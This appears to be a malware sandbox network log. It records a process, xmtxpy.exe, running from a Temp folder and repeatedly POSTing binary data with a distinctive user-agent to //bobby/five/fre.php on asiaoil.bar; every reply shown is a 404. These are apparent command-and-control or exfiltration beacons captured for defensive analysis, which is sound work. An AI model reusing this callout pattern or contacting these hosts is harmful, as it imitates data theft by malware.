                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYIeoMifwVUCSlJ5xQ%2FPPGpv3kxeM8Le4fFZcBSBNQE%2F00nQuzz6hHD2E4yzDxCDvC4GoHGHI7XDrLhEy10sRiqxImrim07qG7zifuLYaSXjE11cVB6vD4NlHq2qFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4454fc86b917d-FRA
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    20          192.168.2.22  49185        104.21.49.244   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:23.504559040 CET  346                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:23.595321894 CET  347                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sM0ogIKfjYVzx%2F54CqSfhjTPc7gH6ECGRuTp6F6Pr791MX1PGLDWaUif41h1edR%2Bl8fsnqA1lYGZ15EqZyjj3xPhB0TdXiYdmWCIYNqlsiw0OjpK0OItnrzqYCRU8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445d0fcca9217-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    21          192.168.2.22  49186        104.21.49.244   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:24.588293076 CET  348                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:24.674747944 CET  349                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=16XyyasiijTs3mtooXtiXEBC3sVd%2FX3IpmrXnVgvAF7rYQXutsuLPMsIWRmqeVqbfgT1uHpXHgFEG6cA94%2Bl1vC5elQ%2F7riyngPQJHQv7Taa1Xkm5yxHj1vPsREEwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445d7baaa91f3-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    22          192.168.2.22  49187        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:25.593017101 CET  350                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:25.698025942 CET  351                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lZXOqBbo1prOUCtgEa8VHKBOX3aiUpw4bwcinIO5LwxwVfvhzB3YO83i0Uy1VUFZYvJDn%2BFVM2Qbb2QX9GH1gNr8iN7INb%2BqvuODkDJIVQrU84Oc3fT4Y6qVHDQFlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445ddfbe390f4-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    23          192.168.2.22  49188        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:26.671474934 CET  351                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:26.773804903 CET  352                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6CwJYTVGa3AnJcsAqL3zNlmjIgfexUkjM4cyDshIwsGRdfYIgN3bflXQh2onteNJ926X8WPY94crt1e3EfkgcxXiKtHHMa5TzW7hc2Hyll4xmtK3kqtsPyKPeb2HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445e4bcca91ed-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    24          192.168.2.22  49189        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:27.690156937 CET  353                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:27.795358896 CET  354                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFC3rc2PYyOGWitcWjhM03gTv0UwrpD%2FeLJzaq90%2BkjJJnsYFLs3%2B9G23tgPe1ch9t2Z3Xrks%2BoXkXgsLvtmsDrXa8JBOdIJfr6DqInywGS59STYxucek4Q2WmLQpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445eb1e9f9189-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    25          192.168.2.22  49190        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:29.085941076 CET  355                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:29.188222885 CET  356                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD7gJsujl0qEAxulzRwvTC2Sbt%2Bi4TFWvsjpt5CDloaVfn3Dt69l4iJM31MUngIv0nBezN298VraYSCFYdNpO%2FbJ4t7%2BWNOgx7HdyUwSUfBLC4eOt4PcY93RnkUHlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445f3db6a5b3e-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    26          192.168.2.22  49191        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:30.799654961 CET  357                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:30.894473076 CET  358                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvu1d3Vbzy6ZrTPTFWBGN7iEn1tx2RtWGRh2C76Vr5y%2B0NzzM1MCSCMy1A4AVEtbLBuKmRIr5zzqHNenni2AJ%2BwOtJJ179UjFozvWTm5cwFRvpN7D1tfeYfx%2FVlSLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445fe9dc491ed-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    27          192.168.2.22  49192        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:31.879954100 CET  359                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:31.985625029 CET  359                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7e4ivEN%2FfJbqg0IR30Nk7YLjE6R7gK9YQJH1DfEk3kbRoonUj0tMEraY%2BRjwLn7cP%2BNl78SF30VWW7AmBXj15TgGfudTHrRaK3bi%2FP7OjjFNWbyUKgOHiQu4SXY%2FXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446054d3a9274-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    28          192.168.2.22  49193        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:32.951127052 CET  360                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:33.053421974 CET  361                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WPprCDT9p343%2B%2BVa2BjaOyqYMB95UNCR5Ua%2FE%2FsZWRzD2F%2FUvoXHTkn2yAiBthKWkFusxeyRDME7Rpcj9nFv2dMiYrPffSB1GdxIUmMvBnBIuGG6eMWuphVFNIVyRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4460bfe8a9168-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    29          192.168.2.22  49194        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:34.006464005 CET  362                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:34.138065100 CET  363                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wShLmzxohhsviCUMQ%2FlqpiKLuE1FOqvf4YebS5qugs3Dzn05nwu27HDgM4qgHb10Sommq5Eo%2FITERtrckpOYW58EIm11S3Cxr5FX3Wb1wYzMe0KX2DB0%2FCIuyrBw%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4461298c49180-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    3           192.168.2.22  49168        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:03.831670046 CET  316                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:03.955466986 CET  317                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lb9okY1H6vGjyVC1u7%2FrtI1IlQS%2BFDAUyP1p%2FRqqpdW3oHWuKdkbXEj1FlsGoYPfJTBdMWMce2JdGAcisXgmjvWPRjePl3xI2oQ%2BLjS4JVazUAB%2FtUVsenR8M%2BuUug%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44555fbc890ee-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    30          192.168.2.22  49195        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:35.055712938 CET  364                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:35.142774105 CET  365                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uRm6cbs7qjH2NOHh2tOKIkP%2BdzbOwZXOMBEJgE3gb2LRZ5T9DoyDbWgSAgyAW9SjYweFy2OcxyEn%2BT93qxg4gzWWmZP%2Bi0t5VxRBmaJZLw%2FLRVoZMESNjhIGteoHMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4461928579004-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    31          192.168.2.22  49196        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:36.072597980 CET366OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:36.184967995 CET | 367 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xrOr1KSQmX9JZILB3weUMlW6l%2F0jQY3ebDX3HclhX28Mcc%2FxH30ewiGA0h%2B6cIBx8JHVt3F2yuoloaiZkYlnrBJGiKNxRH6q72FSDnO4vOtUB%2F3%2FUP0EEMJM1AusYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4461f7a6a9079-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    32 | 192.168.2.22 | 49197 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:37.120242119 CET | 367 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:37.238821030 CET | 368 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RG%2BfeuYDl%2BqDfIJiQqO%2F%2BvdeX%2FsqQOMNdYojKtTw1E0TmD5kZfpZ7nDimmccAbecgCEw4KhPek%2BrNtGEwSzq0DOsMtNFWpBsI22TENldaFbPIU5b5CTiuxOP6VQaaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446260fb19019-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    33 | 192.168.2.22 | 49198 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:38.172976971 CET | 369 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:38.275609016 CET | 370 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8i3MYQHtfXVP%2F0fASkC1TmdLbF6CiAiraD%2FH44NC0ykl97qHV9jn8MkbKPqY5BdlYRn49S%2F8lYCjj%2FQu3cIXkHTHLxiFgznNR4%2Bp6Kgrrg52L092%2FlGqFymsCMGR0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4462c9e3791fc-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    34 | 192.168.2.22 | 49199 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:39.224649906 CET | 371 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:39.314145088 CET | 372 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8IzBsU9ezcfTcYipeA3VQtk7w40pxZ5hjlcKQvqw49ojoP1nGh40I6q6Dyh76z4LCC%2BA20%2Fsg0VifVwdOdSi33A6OvrYN65%2FpXFFW%2FSM0mozc%2B4piSK803pIJT8SEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446333d2791ff-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    35 | 192.168.2.22 | 49200 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:40.420564890 CET | 373 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:40.521979094 CET | 374 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9t3R%2F4b%2BnD1kTHMJA2ZVHrmeMMJ3Bd02VhJ1WPbcEvJly%2BkAhl4QMrCDxePymIvRWvfDOjaPHdcP0k0kjEFpUPsz22Xy7Rg%2F6wzikwLkWIzwoyWJkUL5tvQWI96tAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4463aab43920b-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    36 | 192.168.2.22 | 49201 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:41.439397097 CET | 375 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:41.572663069 CET | 375 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U73XLOsc6Oe9yZY%2B47E4Oe8aR4QjbykbQwVxWcy4AoCZmzTRfSc4KodkgvxCsNphdTrX0C20cDMAGUY1y%2Fzw8iNzNLGyI2dqsO%2B6Mc%2FCxzGZVmVZz0bSOwNj1s7QeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446410864918f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    37 | 192.168.2.22 | 49202 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:42.533999920 CET | 376 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:42.618619919 CET | 377 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gufXVp6viiLfqUVAIhTCHjYJOWCjHt2MTTOHWp5%2BFhyL3M%2BbMbx%2BVMYETZElkIaZ%2FIvrsDt5jDpyZjmMZ9o2O%2FwcV9pRsZqOTc1AF0p2Ib213bW35V6pz00NvcCpPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44647eb7b693a-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


